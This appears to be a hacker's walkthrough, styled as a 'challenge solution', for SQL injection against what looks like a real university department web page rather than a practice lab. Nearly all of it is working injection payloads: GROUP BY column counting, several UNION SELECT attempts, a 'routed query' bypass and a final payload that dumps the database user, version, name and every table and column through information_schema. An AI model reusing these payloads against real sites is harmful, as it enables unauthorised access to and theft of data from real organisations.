Sqli challenge Solution (routed query)

1. SQL Challenge Solution
2. =========================
3. url: http://www.che.iitm.ac.in/inner.php?id=6
4.  
5. http://www.che.iitm.ac.in/inner.php?id=6' Union Select 1,2-- -
6.  
7. if u try to balance normally order by  or group by then u will
8. find 2 columns && this shit error "The used SELECT statements have a different number of columns"
9.  
10. In these types of error we try some method like
11. 1.Bruteforce column,
12. 2.do hex in all columns
13. 3.routed query + etc
14. 4.or error based
15.  
16. There is another option to balance query like this one...
17. +GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100
18.  
19. Now try this way to get columns
20. http://www.che.iitm.ac.in/inner.php?id=6' +GROUP+BY+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- -
21. Unknown column '8' in 'group statement'
22.  
23. so theres 7 columns :)
24.  
25. Lets try this
26. http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select 1,2,3,4,5,6,7-- -
27.  
28. but this "The used SELECT statements have a different number of columns" again :3
29.  
30. Now try your ways to bypass this error
31. http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select 111,2222,3333,4444,5555,6666,7777-- -
32.  
33. not works
34.  
35. http://www.che.iitm.ac.in/inner.php?id=6' and 0  Union Select version(),version(),version(),version(),version(),version(),version()-- -
36.  
37. also not work
38.  
39. you can try more other ways like replace col false,null or brute force, bt its lengthy
40.  
41. In this challenge I found something differrent...
42. :3
43.  
44. ok lets try routed query
45.  
46. We know in routed query every column replaced by null or hex with single " ' " or "1' -- -"
47.  
48. http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,0x3227,3,4,5,6,7-- -
49. :)
50.  
51. found error in column no. 2
52.  
53. http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,"2'-- -",3,4,5,6,7-- -
54. :)
55.  
56. if u try this you'll find automatically vunerable column 4
57. :D
58. or u can do union based again this routed column
59. but I said use union select only 1 time
60.  
61. now others are easy task
62.  
63.  
64. Thanks  .....
65.  
66. My Solution :
67. =============
68. http://www.che.iitm.ac.in/inner.php?id=-6'  Union Select 1,"2'-- -",3,CoNcAt(0x496e6a65637465642062792044697075,0x3c62723e,user(),0x3c62723e,version(),0x3c62723e,database(), (select(@a)from(select(@a:=0x00),(select(@a)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(@a)in(@a:=concat(@a,table_name,0x203a3a20,column_name,0x3c62723e))))a)), 5,6,7-- -